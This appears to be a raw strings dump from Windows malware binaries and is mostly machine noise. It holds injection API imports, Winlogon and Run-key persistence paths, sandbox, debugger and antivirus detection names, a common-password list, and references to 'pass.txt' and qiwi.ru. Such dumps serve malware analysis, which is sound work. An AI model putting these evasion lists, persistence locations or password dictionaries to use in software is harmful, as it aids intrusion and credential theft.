GetWindowLongA
GetAncestor
GetWindowInfo
GetParent
GetWindowRect
GetSystemMenu
DefWindowProcW
EndMenu
HiliteMenuItem
DefMDIChildProcA
GetCursor
GetMenuItemCount
DefMDIChildProcW
DestroyCursor
DefWindowProcA
GetMenuState
CopyIcon
TrackPopupMenuEx
GetMenuItemRect
GetMenu
MenuItemFromPoint
GetSubMenu
SetKeyboardState
GetMenuItemID
OpenDesktopA
GetUserObjectInformationA
PrintWindow
WindowFromDC
SetLayeredWindowAttributes
EnumChildWindows
RedrawWindow
GetWindowRgn
SetClassLongA
SetWindowLongA
GetScrollBarInfo
MoveWindow
DialogBoxIndirectParamA
SetWindowTextA
ShowWindow
EndDialog
GetDlgItem
CreateWindowExA
GetWindowTextLengthA
GetClientRect
LoadIconA
AttachThreadInput
DestroyWindow
wsprintfA
PtInRect
GetFocus
RealChildWindowFromPoint
GetClassNameA
GetCursorPos
GetWindowTextW
GetOpenClipboardWindow
GetActiveWindow
GetWindowTextA
GetGUIThreadInfo
GetKeyboardState
ToAscii
FindWindowW
DispatchMessageW
PeekMessageW
TranslateMessage
MsgWaitForMultipleObjects
GetWindowDC
USER32.dll
GetDeviceCaps
CreateCompatibleBitmap
CreateCompatibleDC
SelectObject
DeleteObject
GdiFlush
GetDIBits
CreateDIBSection
DeleteDC
CreateRectRgn
OffsetRgn
SelectClipRgn
SetViewportOrgEx
GetViewportOrgEx
BitBlt
GetClipRgn
GetObjectA
CreateFontIndirectA
GDI32.dll
RegQueryValueExA
RegOpenKeyExA
GetUserNameA
RegCloseKey
RegSetValueExA
RegFlushKey
RegDeleteValueA
RegEnumKeyExA
RegNotifyChangeKeyValue
OpenProcessToken
GetTokenInformation
RegDeleteKeyA
ADVAPI32.dll
memcpy
memset
_except_handler3
>?456789:;<=
 !"#$%&'()*+,-./0123
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
;3+#>6.&
'2, /+0&7!4-)1#
O/o_?
$Id: dbfopen.c,v 1.48 2003/03/10 14:51:27 warmerda Exp $
Desk_%u%x
-xFS]
!nuca?B
h2A co*SSFQ37
JD4?'
gTC/L7dkto
;EOUhq_
S@9':] "^znztV=
'h?c ,Z
D"N47T0h|-
qX_Ro.)}eM2UY.
[rPfmV8Q
t[jq+a:U
k"_}1I{D7
n3r4Nnf
||~hYk
.Y+t~2MlUj
sI)79B
MSCTF.Shared.MAPPING.%x
.current
MSCTF.Shared.MUTEX.%x
0@0G0u0000000000
1,1=1J1U1d11111111#2@2G2s2}22222222'313;3n3x333333
4-4i444444&5x5555555
6C6|666666666666666
767F7L7x77777777
8 8&8_89!:J:U::
K88888s9999&:q::::
;4;v<======
0192222222222
3,333=3D3a3q3v33333333
4(4/444444444
5!5555555555
6)6W6^6h6666666
7+727<7F7Z7`777
8'8,8;8D8W8f8o8|8888888888
9'9D9M9U9[9`9k9r9{999999999999
:6:P:W:e:::::::;;;
<-<6<R<c<j<<<<<<<*=0=G=b=s=z======
>">^>e>>>>
?"?(?1?J?b???????????????
0"0L0\0p000
1 1'1_1r111111111
202@2O2_2e2q22222
3)3b3i333333333$4=4[4d4444444
5g5n55555
6F6X6j6z66666666
7!7I7w77777777
8&868V8c8j8x88889
:0:7:H:r:y::::::
;";q;;;;;;
<g<z<<<<<<<
=c=v=======[>b>s>>>>
? ?'?0?9???Q?~?????
!0(090J0Y000000&1-1>1O1^11111
2.252F2S222222G3Z3333333>4Q4{444444455H5r5y5555555555
6G6Z666666
7,7X777777#8_8888888
9 909\9999999!:(:\:b:m::::
;*;0;9;O;\;{;;;
<%<5<J<n<<<<<<4=C=X=e=|========
>&>2>>>J>V>b>n>z>>>>>>>>>>
?"?.?:?F?R?^?
0.0R0]0r0|000000000000000
1 1&1.181@1I1S1e11111
3X3_3333333
4"4:4U4^4v44444$575b5w555555*666
7$71777
88>8E8O8V8e8
8888888U9\9|9999
:0:>:::::
;\;c;;;;
<!<'<B<f<p<<<<<
0040E0K0P0000000051{1111111
2H2f222222
3*313Q3b3r33333=4D4k4|44444`5g5555555
6/6>6L6S666666
7'7.7J7Q7~77777777#8H888
9D9999
:l:}:::/;6;u;4<x<
<<<<<<<
=#=0=a=f=u=========
>J>Q>[>v>{>>>>>>>>
??)?/?W?e?o??????????
0'0,060?0J0Q0V0t0000000
1+151?1X1^1n1x111111111
2*282Y2h2s2x222222
3 343<3A3F3L3S3u3333333333333333
4)4.464C4^4g4p44
5"5R5555555555 6'6N6X666R708A8M8k8p888U9
:%:1:G:M:S:[:
<1<9<D<N<T<\<b<k<q<z<<<<<<<<<<<<<<
=7=A=I=O=\=m=====(>2>;>A>T>Z>b>q>y>~>>>>>>>>
?.?B?I?N?f?w?}????????????
0)0/080W0d0o0u0000000000000
1#1(1;1E1L1R1^1e1k1r1x1
111112222
3)353>3D3R3|3333333
4"454D4c4i4p4z444444444
5$5*50585?5E5_5y555555
63696@6J6W6i6o66666666666666#7-747>7I7X7888
9;9L9S9\9o9z99999999
:#:F:`:s:z:::::::
;-;:;J;Y;a;p;};;;;d<h<l<p<t<x<<<<<<<
=8=?=F=_=l======
>(><>E>g>t>x>|>>>>>>><?B?H?a?l?w????????????
0<0D0Q0\0c000000
131L11111
2+2222U3h3
4$4(4,4044484<4@4D4H4j4r44444444
5j5t5555
646S6g6{66665888888
9/9<9N9f9s999999
:.:7:=:G:M:w::::::::::::
;$;*;C;T;a;s;{;;;;;;;;;;;;;;;
<;<J<b<o<<<<<<<
=;=J=b=o=======
>;>J>b>s>>>>>>>
?;?J?b?o???????
0;0J0b0s0000000
1%1.191H1\1c1k1r1z1111111111
2 2<2K2h22222
3%393?3J3U3a3h3}333333333
4(454H4U4h4u4444444445/5E5U5u55555555555
6%6*606R6Y6k6z6666666666
7#7-72787b7i7}7777777+818H8\8888888888
9 9I9h99999
: :Y:^:d:i:s:y:
:::::::::::::
; ;);6;E;S;Y;c;};;;;;;;;;;;
< <(<5<:<@<I<N<T<d<s<<<<<<<<<<<<<<
='=7=<=G=W=\=g=w=|=============
>'>7><>G>W>\>g>w>|>>>>>>>>>>>>>
?'?7?<?G?W?\?g?w?|?????????????
0 00050@0P0U0`0p0u000000000000
1!1F1T1^1n1u11111
262V2x222222222
3.343:3?3D3W3f3y333333
484A4T4d4x44444444
55)505H5Y5d5j55555555555
6-686H6666666666
7*7@7F7f77777777
8-8C8M8S8g8888888P9i9
:1:K:f::!;;;;;
<3<E<L<W<<<<+=9=E=R=s=z=====
>#>*>9>N>>>>
?,?9?@?O?d???
>0t0000000
11c1l1r1z11111111111
2%2+2D2J2R2Z2i2n2t22222222
3e3333333333
4!4E4R4b4u4444444444
5+595F5L5U5[5`5m5z55555555555
6"6/6>6J6O6Y6`6g6u6666666666
7;7B7I7]7r7777777777777
8&8+83888Z8e8k8p8{8888888888
9'929<9K9^9q9z9999
:#:':H:q:::::::
;#;4;N;q;{;;;
<,<5<?<E<g<q<{<<<<<<<<
=%=:=r========
>$>8>>>T>{>>>>
?-?T??????
000000000
11111&222T2\2222222234444
5525B5U5e5k5w555555588799::;;;;I<<p==/>>>>F?c?u??
00f1m11
2P2W2c2j22223444p5w55555
6"6D6f6667777/8R8j888
969s9~99999
; ;D;7<k<~<<<<<
=#=.=:=?=J=V=[=f=r=w=========
>;>B>>
?'?e?q??????
C0u000000
1Y1p11111111112$2?2F22222
3S3]3334l44$5+585?5X555555l6t6666
7D7o777.8~88888888
9)9J9]9x99
:&:M::::::
;6;];;;;;o<{<<<'===c===L>>>
??/?f?l?{???????????????
0#0/040?0K0P0[0g0l0000
1$1)1U1Z1s1111111111
2E2J2222273F3\3b3k3x33333
4>4E4t444
6*616?6R6j6p6w666666667H7X7a7h7x7777777778
9#9a:h::::T<[<h<o<<<
=y=======
>8>N>>>>
?5?E?Y?i?x????????
0.090E0Q0000002181B1_1f1m1|1111111111
2"252O2U2s222222
3%3+3^3i3n3333
4c44444
5(5k5}55555>6r666666666 7.747N7S7777
8i88888
9R9c9s9999999999
:Q:`:s:::::
;,;2;;;;;;
<8<?<G<m<t<z<<<<<<<<<<<
=p=t=x=|====[>p>>>>>>
?@??????
:0J0e0w000000
1*1w1~11111111111111
2;2B2H2R2X2h2p2v2|22222
3(3C3q3x333333333
4o444444
5Q5]5m555555555-6h666666
7\777777748A8G8M8R8d8{88888-949[9d9999
:n:s:::::>;C;;;;;;7<D<W<d<n<t<z<<<<<<<<<<
=3=:=g=s=======
>->4>[>a>>>>>
?^?e??????
*060000000&1Z1f1112292\222
3<3333/464t4444!5y555555+676G6O6U6`66
7T77777777
8(868;8M8{88888,9M9]9l9|9999999994:t::::::
;?;L;[;e;t;;;
<,<g<x<<<<<<
=7=F=Y=v={====
>@>h>o>>>>>>>>>>%?+?D?K?[?o???????
0*0A0G0V0h00000%111A1g1t111111111111111
2!2i2n2v2}22222222222222
3&333?3D3O3[3`3k3w3|333333333333
4&42474C4g4s444444444
5"5'525>5C5N5T5Y5^5c5{555555555555
6*6<6L6S6l6v66666
7Z7`7h77777
8-858:8M8T8^8{8888888
9Z9`9h9q99999
:#:,:d:z::::::::
;4;J;Q;_;p;;;;;;;;;
<%<z<<<<<<<<
=4=A=G=O=d=o=====
>+>@>F>e>n>>*?0?8?P?h??????
01060A0{000000
1z11111111
232T2a2g2o222222222
3.3C3J3T3^3c33333333*40494B4g4p4444444i5p555555555
6@6H6]6u6666666+777G7V7c7777777
8 8-878J8R8[8e8o88888888888
9'9,9B9L9j9{99999999
: :6:T:e:k:w:::::::::::
;$;:;P;f;|;;;;;;
<,<B<m<u<
=F=Q=|======
>)>T>_>>>>>>
?,?7?b?m?????
010J0T0j0|000000
1"121Q1`1y1111111111
2,262N2_2g2t22222222222
3;3I3_3s3y3333333
4T444444
5 5&5R5555555
6 6166666
7N7q777777777
8'8J8P8e8k88888888 9'9,939j9999999
:":D:K:U:_:e:q::::::::::
;B;|;;;;;
<<<]=e===
?L?d???????
0-0S0a0p0w000
3G3Z3`333333
4#4+44
525D5I5P5]5k5r555555
6+626Z6`6h666666666
7:7@7H7p7z777777777
8>8R8d8i8p8}8888888
9 9-92999Z9`9h999999::::::
; ;-;2;9;Z;`;h;;;;;;;;;;;
< <(<I<S<k<~<<<<<<<<<<<
=%===N=T=`=p======D>^>e>>>
?5?O?v?????
0/0V0000
1+1B1i1111
2/2F2m22222222
3'3,373C3H3S3_3d3o3{3333
4?4F4L4r44444<55555555
6k6w6~66666
8 8,8N8h8888888
9!969<9B9P9`9l9
999999999E:^:m::::::::::
;);W;^;h;;;;;;;
<+<2<<<F<f<l<y<<<<<
=4===B=T=u=~======
>)>6>V>[>x>
>>>>>???
0z071L1o1111111
22%2,2H2Q2V2\2g2p2v2222222
3I3P3h3t3{33333334>495V5]5555s6z66
:::;;;;;;;;"<3<9<><w<<<<<
=#=4=:=?=
=========->3>;>l>>>>>>>>>>
?"?3?9?>?????????
060B0P0X0a0g0n0s00000000000000
1+191A1J1P1W111111111
2!222R2f2l2q22222222
3 3'3-333J333333333
4'4;4M4R4X4]4b4444444$575=5B5y55555555555
6"6(616M6U6f6m6r6w6}6666
7"73797>7}777777777
8$8*8J8P8X8m8w8
888888888>9R9c9i9n999999999
:#:):.:g:q:y::::::::::-;3;a;g;n;x;;;;;;;;;!</<4<A<I<O<l<~<<<<<<<<<<
=%=Y=r=========
>[>b>h>p>>
*01000K1Q1Z1c11
2`2i2w22222222222
33333333
4,4@4q4w4
5M5S5[5w5555555
6"6X6c6z666666666666!7&757E7[7s77777777777
8 8&8.8R8`8f8k88888888
9.9M9_9p999999999
: :3:r:::::
;/;<;;;;;;;;h<<<<
=#=?=j=w========
>!>(>;>A>>>>>>>
?&?-?@?F???
!0U0000$11171R1`1f1k111111111
2$2:2@2H2W2`2j2p2222222222
363>3M3T3j3p3x3333333333
4#4*4=4D4L4f4n4}44444444444
595L5T5c5j5}55555555555
6#61676<6p6}66666666666
7"717;7E7K7b7p7v7{777777777
8-848J8P8X8a8p8y88888888
9!9*939B9S9Y9^99999999::@:I:R::::::
;!;/;>;M;Z;f;r;;;;;;;;;;
</<7<D<X<i<}<<<<<<<
=$=)=0=]=f=======
> >*>B>S>Y>r>y>>>>>
?#?)?/?<?H?V?b?t????
0@0J0b0s0000000
1'1.1;1S1]1d1i1x111
2!2j2}2222
3%323@3R3`3f3k33333333*404W4e4k4p44444444*50555
6c6v6|66666666
7*7R7c7i7n77777777
838M8W8h8o888888888
979@9N9_9f9{99999999%:2:=:G:L:e:v:::::::::
;E;X;_;l;;;;;;;;;;
<*<0<8<M<Z<_<q<<<<<<<<
= =(===J=q=v========@>I>W>h>o>>>>>>>>>>R?X?e?k?p?~????????????
0$0.0Z0m0|0000000000
1"1(121D1L1V1`1q1x11111111
2'222<2R2t2y2
2222222!3'3/3B3[33S44444444
5'535A5I5R5X5_5d5z55555555555555
6)616:6@6G6L6[6b6k6{666666666
7?7F7S7\7d7u7|7777777
8G8P8^8o8v88888888859B9M9W9\9u99999999999
:<:S:X:h::::::
;4;D;Y;i;;;;;;;
<(<-<8<=<H<M<X<]<h<m<x<}<<<<<<<
=5===N=U=j=p={=====
>&>->>>>>>>>>>
?2?F?L?Q?????????
0*0|000000000
14191?1D1I1
1111111
2+222e2v2222222222
3R3c3i3n333333333
4C4Q4W4\4444444444
5,5?5i5z5555555
6H6Y6l6{666666666
7-727B7R7^7r7}777777
88&8;8A8_8p8w8}88888
9+919W9b9l99999999
:S:]:e:v:}:::::::::;@;L;;;;;;;
<2<8<A<\<i<<<<
="=3=:=z======
>G>P>^>o>v>>>>>>>>>Y?f?t?|????????
0 0'090J0l0q00000000
1$1)1/14191k11111111
2N2V2`2x222222
3'383?3Z3`3r3333333
4!4(4:4K4j4r44444444444495>5M5\5r5555555/696A6R6Y6f6~666666666
7+7C7U7Z7`7e7j7777777
8$8)808]8r8888888
9)989B9L9d9u999999
::&:;:A:_:p:w:}:::::
;";3;8;>;C;H;k;|;;;;;;;;
<*<0<8<M<Z<o<y<<<<<<
="=5=;=B=u=~==========
>2>C>I>N>>>>>>>>>>
?0?_?j?v??????
0/060K0Q0o0000000
1/1Q1\1f1|1111111
22.242B2I2R2[2x2
22222222
3(30393H3[3`3i3s3"43494>4y444444444
5%5,535s5}55555555"6>6[66666666
7x7777
8$828C8I8N88888888888B9r999999999
:::::::
; ;+;8;b;s;y;~;;;;;
<%<,<><O<X<d<t<<<<<<
==&=;=A=_=p=w=}=====
>>A>L>V>l>>>>>>>>>
?-?2?8?=?B?r?????????
0/0@0G0M0S0j000000
1&1<1^1c1i1n1s11111
2 2G2L2T2_22222:3@3I3R3f33333333"434:4z444444444
525E5L5S5555555555B6^6{66666
7-7:77777777
8O8U8]8r888888)969D9L9U9^9{999999999":5:<:C:w::::::::::
;';?;P;i;;;;;;;;;
<D<b<s<y<~<<<<<<?=N=b=s=y=~===
>j>y>>>>>
?#?+?T?e?k?p??????
0<0A0P0e0{00000000
111D1b1s1z1111
2!22292F2^2i2r2y2222222
323<3F3P3a3h3z3333333
4 4%4*4g4~44444
6+626\6b6r66666
7K7k7r777777718W8]8c888809B9O9U9^9q9
99999#:V:d::::::
;F;b;h;~;;;;;;
<D<K<o<<<<
=E=L=p====A>P>>>>>
00%0.050>0F0i0u000000
1!1k1v1111111=222
3!3J3[3|333333
4?4E4{44444;5W5e55555*6b6s666666666
7H777:::
;M;`;o;;;
6'69666
789M::;;
0L0Z0h0v011c23
3)3?3U3k333333
434=4C44445V6p66
7^777777Q8888
979E9W9999::
;W;^;;;
<#<2<<==*>?>L>
M1T182?2L2S2Y2e2u222T3k3z33333
44/4;4K4P4444
595B5H5a5
55555%6;6_6n6666
99"::::;;;*<4<><H<R<\<f<p<<)====1>t>|>>>>>>>>>>>>>>>>
?"?(?0?7?|?????
1T11422
3(4}44Q5a5566v8a99/:: ;;;s==k>>>>
)0111111111111
2@2S2e2233<4D444^666
7;7V7n7t7
777777X8e8
:T::::
;/;5;B;K;T;Z;g;p;
>:>r>>>>>>>
S0Z0`0k0w0
00000000
111D1Y1111Z222
33*4j44444
66666&7d7/8\8u888
99::K;j;s;;;;$>>
1-2222L3Q3]3d334I6666j77777
8!81888d993:A:k::y;;;W<{<<<4=a====
>7>>>d>>>l??
0r00D1W1111
3,3u333333333333333
4H4%55557,99F::V;;[<|<<<
=B============
1122i3s3355f6666666
99O;;<<2=f===$>>>
I0'1:1T1e1194j4~444
5'5555u66B7Y7`77848G888
9)9b99999999:::1;F;[;;;;0<E<<<
>->:>v>>>>>>>S?Z?`?k?w?
0*020F0q0w0
101611B2d223344559:F:T;a;b<<
122C2B3f37
88$9299B:c:/;;9<J>>
0#112-3555566666
7#7w7748-999#;J=
4:::::::::::
;P;c;u;;<<L=T===??????????
00s222222222233b5555555555v666;X<<9==>>>>>>>
S0d0m0~000000000000
11(161?1M1V1d1i33 4'464@4T4c4r4|44444444
4i445W6666#7&8585<==
%4N4]477
0(060B0M0
1>1h1111
2 2.2722222333333}45==x>>>>>>;?I?q?z????
1*161111122
35:e:::
;I;U;;;;;
<4<d<<|====
?j?t???
66H7V7d7r777
8@8I8x888J9999
:k:u:::l;;;;;
2%33333
4j4~44444$55<6F6Z6f666667*848B8K8>>5?C?Q?_????
0$0-0\0s00>1111
2|222233
4E:u::
;;K;W;;;;;
<3<x<<====<>F>[>d>c?????
1E11111
3>33`4j4z4444
55I6S6a6j67
8888888O9c99999
::0;:;J;V;;;;;<
=#=1=:=>>]?k?y????
030R0\0000g1
2+272222233333u55
6+696H6v6666
7K7c77'88888O9Y9k9t9B::::: >
{11w33)5D5R556779H<=?
4181<1@1D1H1L1P1T1X1\1`1d1h1l1p1t1x1|11111111111111111&202@2>>
6%666U7g7<<<<<<
=E=p===>??????????
033o5v5558888949:9B9
;,;8;D;P;\;h;t;;;
======
5,5@5H5L5P5T5X5\5`5d5h5l5p5t5x5|555555555555555??????????????????????
0 0$0(0,0004080<0@0D0H0L0P0T000
12253s335
$Id: dbfopen.c,v 1.48 2003/03/10 14:51:27 warmerda Exp $
K;j;s;
8 2003/03/10 14:51:
0000000
00000EN1d1\
99O;;<<2=f===$>>
K;j;s;
8 2003/03/10 14:51:
0000000
00000EN1d1\
99O;;<<2=f===$>>
K;j;s;
<2=f=E
Y,&tqa
}YL@}A
8 2003/03/1
KPKPKPv
K;j;s;
K;j;s;
K;j;s;
;j;&ts
j;s2=f
;j;&ts
PK;,c/
DS69D'
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone3
DS69D'
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone3
DS69D'
pass.txt
Local\{EAF339BF-89ea-4fe1-9e
L!This program cannot be run in DOS mode.
`%{`%{`%{i]a%{
b%{i]u%{`%z%{
Sa%{Rich`%{
`.rdata
@.data
.reloc
3WhxD@
_^[]_^
SSShD@
SSSSEPSSQ
URh,E@
@:u+W?
3_6MQh
U SV3Wu;
3EEEEEEj
EPhp@
_^[]UV39u
SVW3j@ESP];!
3SQ]EEE
MQURSSSSSSSPED
SVW3h$
KTEPQh
URUPWQR
@(E;|}uCPURh
t,MQWE
E_^[]U
U$VW=t@@
EPMQURV
t:UREPMQV
3EEEEEEEj
EPhp@
SVW3h
mE_^[]UjhR@
3QSSj&S
u;t2hM@
;t"]SE
SSShM@
TX\`dhlp
t0SDPj
^[]U`S3VSh
]]]E^DE
tAW=@@
SMQj(URV
MUSEPMj
SW=x@@
_[^]U4
W}}}}}
URhpN@
URURPA(=
uyMQhN@
RPA *}'E
QHWP3E5LA@
S3VWD$
D$ D$$D$(D$,j
P3hp@
0@:uD$0P
;t hE@
t)D$0HH
@:u|$0+OO
T$0RhN@
L$4Q$@
t$0PYL$
Q-;tDV
VD$4%3
L$4Q$H
;t hE@
L$0Qqh
U@+f=`A@
t=ehN@
fu@hN@
fu@hN@
UE}]MQ|E
x[h(O@
usEUR3u
URh8C@
P;|>h,O@
MU=XA@
uEEEPMU
EQ}UEq
EPRQOD
T$0RD$4
QSt$ t$$
T$,RVWS
u/MQREPj
SVW=p@@
Nwt\=>
tU=dotNh
3_^[]UVE
yd?BcsV
9F+Jb{h!kcF
iMX7e{
NKagj(hOTmR Mr
MuCuDY6Ag
2zQGWvB)
ADj\8PmC(
Ij5*WA z:L
&>Mb=LkI
<Gh^PF
*7R/mufO*}
mSwOR5o
L_}zi6
,RCfm&
\NOLLYDBG
wireshark.exe
dumpcap.exe
idag.exe
vmwaretray.exe
\\?\globalroot\systemroot\system32\vmx_fb.dll
SystemDrive
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
userinit
\\?\globalroot\systemroot\system32\drivers\ntfs.sys
ntdll.dll
RtlUniform
kernel32.dll
IsWow64Process
kernel
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
server
idontknow
administrator
666666
12345678
soccer
abc123
password1
football1
fuckyou
monkey
iloveyou1
superman1
slipknot1
jordan23
princess1
liverpool1
monkey1
baseball1
123abc
qwerty1
blink182
myspace1
user111
098765
qweryuiopas
qwerty
111111
password
123456
Windows Defender
MpClient.dll
WDEnable
\\.\KmxAgent
____AVP.Root
\\.\pipe\acsipc_server
\AVG\AVG9\dfncfg.dat
\AVG\AVG9\dfmcfg.dat
\PrevxCSI\csidb.csi
BL09n@:
j`4bOND
PTue Aug 2 12:53:17 20112
winlogon.exe
explorer.exe
\apppatch\
svchost.exe
Tue Aug 2 12:53:17 20111
user32.dll
HARDWARE\DESCRIPTION\System
SystemBiosVersion
test_item.exe
SANDBOX
MALNETVM
VIRUSCLONE
test user
\sand-box\
\cwsandbox\
\sandbox\
_snprintf
strstr
_snwprintf
wcsstr
MSVCRT.dll
SHGetFolderPathA
SHELL32.dll
PathFileExistsA
StrStrIA
PathAddBackslashA
PathAppendA
SHLWAPI.dll
RtlImageNtHeader
RtlCreateUserThread
RtlAdjustPrivilege
ntdll.dll
IsDebuggerPresent
GetTickCount
GetVolumeInformationA
GetEnvironmentVariableA
GetModuleFileNameA
CreateFileA
SetFilePointer
MoveFileExA
lstrcpynA
SetEndOfFile
UnlockFile
LockFile
SetFileTime
WriteFile
IsBadWritePtr
ReadFile
GetFileSizeEx
GetLastError
SetFileAttributesA
GetTempFileNameA
GetFileTime
GetTempPathA
DeleteFileA
GetProcAddress
GetModuleHandleA
HeapAlloc
HeapFree
GetProcessHeap
HeapValidate
GetCurrentProcess
FlushInstructionCache
VirtualAlloc
VirtualQuery
Process32First
VirtualFree
CreateRemoteThread
OpenProcess
CreateProcessA
Module32First
GetHandleInformation
VirtualAllocEx
LoadLibraryA
Process32Next
CreateToolhelp32Snapshot
Module32Next
CloseHandle
WriteProcessMemory
SwitchToThread
GetSystemWindowsDirectoryA
FreeLibrary
GetSystemTimeAsFileTime
GetModuleFileNameW
SetCurrentDirectoryA
MoveFileA
DeviceIoControl
ExitProcess
GlobalAddAtomA
GlobalFindAtomA
CopyFileA
GetCurrentProcessId
InterlockedDecrement
CreateFileW
GetVersionExA
KERNEL32.dll
FindWindowA
CharUpperA
PostMessageA
USER32.dll
RegSetValueExA
RegQueryValueExA
RegCreateKeyExA
RegOpenKeyExA
RegFlushKey
RegCloseKey
OpenProcessToken
GetTokenInformation
GetUserNameA
ADVAPI32.dll
CoCreateInstance
CoUninitialize
CoInitializeEx
CoInitializeSecurity
ole32.dll
OLEAUT32.dll
_except_handler3
memset
memcpy
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
L!This program cannot be run in DOS mode.
`.data
.reloc
EZXE_]
F<W|0xu
D0|L7$U
;sz;rv3;.E
E;s[SVQ
3VEEEEEEE=h]
E^]U83VWE
EEEEEEh]
wPhJaPej@h
WTU}uMu
D0,~*HM
M}uM(Ju
uFP+V4RP;
h[Au0PV
EPIMQV
EEEEh]
E}uMMq(
PR[_hmPj
L!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
SWWWWjPWW
WWSVjPWW
t WWVh
t<WWVh'
3VVVVjWVV
3VVVVjWVV
EEEEEEE
;}r^3j
EEEEEEE
WStS_^E
E3EEEEEEj
;}r_3j
]EEEEEE
3t^VVVVjWVV
_^[]U,
_^[]_^
[]UDSVW
WSPQRN
K_^3[]
Ju_^3[]
\}tX]EU
JU:t.O3
x[_3^]
T8u_^[]
SVW rf}
+E3t0M
9u_^[]
QUVUKOu
3Jt-SVx#33
D$<L$<
D$<D$<y
IJuD$<@D$<
QSRVPt
MUP<6WQSRE
MUPWQSR
QPR3_^[]
USQPPRN
MESVQU
EMRUPQVR
u&ESWPM
UEQMRPWQE
Mv:u}$
MUPQVWRE
MUPQVWR't
F;ur_^3[]
WWWWURWWP
u'URUEPMQj
@u+;ru
^u4MQh
u'MQMUREPj
u'URUEPMQj
@uVW+OO
MQMUREPj
E]UQEPh
^UHSV5P
PSEu<WP
fD$8SP\$<p
L$0QVD$8(
L$\T$`D$d
T$8L$TQRhZ
]EMfU9]
VWUEPMQjh
@u}Gkd+
WURUPj
SSV]Sj
URPXQV
URPXQV
URPXQV
EPQXRV
URPXQV
URPXQV
URPXQV
3+P3+P39X
URPXQV
@u+EEE
URPXQV
^[]U8E
]EEEEEE
;}ra3j
]EEEEEE
EEEEEE
;urj3j
EEEEEE
EEEEEE
;}rj3j
]3EEEEEEEj
Ut[Vh
}tXM3It.$
<>http
}UFJ;r
}tZU3t.
<>http
VU}EF;r
3_[UVu
EEE1X_
,_^[]U8
URWVuSV$E
u3;t Uh
u8V$t.
URUPMQVh
MQMREPVh
}7@}2j
GN_^[]Qh
NVPL$0QR
3fD$(D$*PfT$,
3EEEPS
UQ3E9E
tE;tASj
S-%50R
SVW3VEPE
PEMQSRP
@:u+V@3;t'x
@:u^E;t
RUEPSQR
@:u+V@3;t'x
@:u^E;t
3SRfMS
@:u3fE
SVW=XR
%_^[]UQS
]_^[Y]
u_^[Y]
MQPjE3@fE
^USVWh,
^ ^$fN
SSQSVR
D$0D$4D$8D$<
D$@D$DD$HD$L
D$@t$(t$$D$
AJu\$(L$
D$$SPS
;|$ u1|$
D$$SPS
3C\$(L$,
2_^[]U4
t$(t$$D$
AJu\$(L$
D$$SPS
;|$ u1|$
D$$SPS
3C\$(L$,
2_^[]U,
E};}u4}
tuEVPEV
_^[U4l
EEEEEEEPj
\$PD$T
j@T$HSRK
PSjj$S\$(D$TD
RD$DPSSSSSSS$
D$(D$,D$0$
PSjj$S\$8
PSSSSSSS$
;tD$(T$,=\Q
O9W=PMOAUWEEPMUw
u2_^[]
G8W._^[]
p;}^[3_f
+QM+RPQj
U4SVWj
QWj Wf}
PW_^[]
T$$RSD$,<
QT$8R||$
RD$8P:|$
PL$8QE
RD$8PE
SB6tTj
tg;u29
PQr_^[]
PQ_^[]
PQr_^[]
PQ_^[]
PQr_^[]
PQ_^[]
PQr_^[]
PQ_^[]
PQr_^[]
PQ_^[]
t5t1>0u,F
t5t1>0u,F
EEEEPE
_3^_^%L
S3VW9]
3EEEEEEj
;}r[3j
]EEEEEE
E4M0U,PE(QM$RU PE
M4U0E,QM(RU$PE QM
r3@tGEPVE<
r3@tCMQVE<
:U@VEPVE<
t#MQWE
PE+QM+S+P+
UEMRUPQR
]EUMh
RU+QM+RPQS
_^[]ULS
E?M};}
VuWV+RU+PSQR
_^[]U<S]
taURjSE<
F(MQjS
t;j8Ej
WPP(^]U
S3VW]]9]
WPP/C;]~}t
EM+|+MjVEM
taURjVE<
MUEMQjV
EMU|Pj
EM+E+MjVE
t(DHLE
t(DHLU
EMUEPj
PP_^[]
E^]US]
3WWj1P
L$lQj<P
T$0RWD$8<
uuD$ P'V\$ D$
D$$L$,T$ h
Vj'j#SPh
UQSVWEPh
<_^[]SVW
LSVWPQj
RJjV%PjV
t';t#j
u3_^[]
UQSVWj
E_^[]U,
u4V7t#S
;u0;t&5P
A A$A(A,_^[]
;r_^3[]
+_0^[]
A+_0^[]
+_0^[]
+_2^[]
0Nu;tLu2t
_^[UVu
@u+;u-t)t%3
BA;|[_3^]
UQSVW}
33M<-u
G<0|4<9
IF;r_^UE
?:tD;r_^[]
;:tXU;r_^[]
VPC$s(EH
UQSV9}
MA@M;M
3U;s^;s
>:tHU;r_^[]
u>2u08F
t5MQP*t
t/EPh@
DF^US]
3t9VW{
u*t"SW
tIE;v:PE
:u!E++R
MWQS#T
UDSVW}
=POSTu
=GET u
QRVD$$PD$
T$ RZ
T$$D$ RPu
WPV|$
G _^[]
_^[]_^[]
_^[]UU
Wt%t!t
G0;rRSV
QRD$0P
RD$8PD$
T$0+T$4t$
D$$VPS(N
_(+_,;s
3G$G(G,_^[]j
_^[]UVW}
@0;r_^]
Vs^]Vj
Eu@,Eu;
#_^3[]
u3Bk,R<
t"WWWW~
Ik,QW;
L$ QRt$@
uPG(PoK
D$0t?O
D$0L$,PQ
G +G$M
EPQj-^ R
t/=POSTu
}M}}9}
URVj"PE
EMQURj
MQWj)R
UuWPEQMRPh
@u+P={
U8S3VW=pQ
EEEEEEj
;ur[3j
]EEEEEE
